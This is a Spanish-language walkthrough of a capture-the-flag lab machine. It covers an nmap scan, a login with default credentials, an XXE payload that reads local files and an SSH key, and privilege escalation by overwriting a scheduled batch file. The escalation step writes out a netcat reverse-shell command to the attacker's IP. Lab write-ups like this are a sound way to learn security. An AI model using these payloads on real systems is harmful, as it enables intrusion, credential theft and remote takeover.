Markup

under

Encendemos la máquina y una vez verificados con ping lanzaremos un escaneo rápido y sigiloso con nmap para identificar los puertos abiertos:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.95.192 -oG allPorts
under

Utilizando la utilidad de extractPorts como siempre copiaremos los puertos abiertos de la captura y haremos un escano exhaustivo para identificar la version y servicio que corren para estos puertos:

under

Miramos los resultados del escaneo:

under

Explotación

Vemos un servicio web, podemos probar a enumerarlo con whatweb para ver un poquito a que nos estamos enfrentando:

under

Vemos un apache y un ssl, recordar importante que ssl es un puerto para HTTPS entonces también podemos atentar contra este puerto con whatweb:

under

Sin muchos resultados abrimos la web y nos encontramos un panel de login:

under

Pudimos burlar este panel con admin:password como credenciales por defecto.

under

Vemos que la página tiene una parte curiosa y llama mucho la atención:

under

Probamos a colocar datos y interceptar la petición con Caido:

under

Y vemos que se está tramitando un estructura en XML, y como estamos frente a un Windows podemos tratar de listar contenido del hosts:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>
<order>
<quantity>
3
</quantity>
<item>
&test;
</item>
<address>
17th Estate, CA
</address>
</order>
under

Y efectivamente, por tanto tenemos un XXE XML EXternal Entity, podemos intentar otra cosa como ir listando el directorio del usuario y vemos que podemos acceder al directorio de daniel y a su carpeta .ssh:

under

Una vez tenemos esta llave rsa podemos conectarnos por SSH:

under

Y habremos completado la intrusión:

Escalada

Al igual que las máquinas Linux con sudo -l en Windows podemos hacer whoami /priv

under

Podemos acceder a directorios privilegiados y encontramos dentro de C:\ un directorio inusual llamado Log-Management

under

Vemos que podemos ejecutar job.bat como Administrator y usando icacls podemos confirmarlo

under

La idea será subir el ncat para windows y entablar una reverse shell abusando del binario.bat<div style="text-align: center;"> under </div>

Estando en escucha por el puerto 443 ejecutamos echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.12 443 > C:\Log-Management\job.bat

under

Voila! obtenemos la shell como Administrator.

under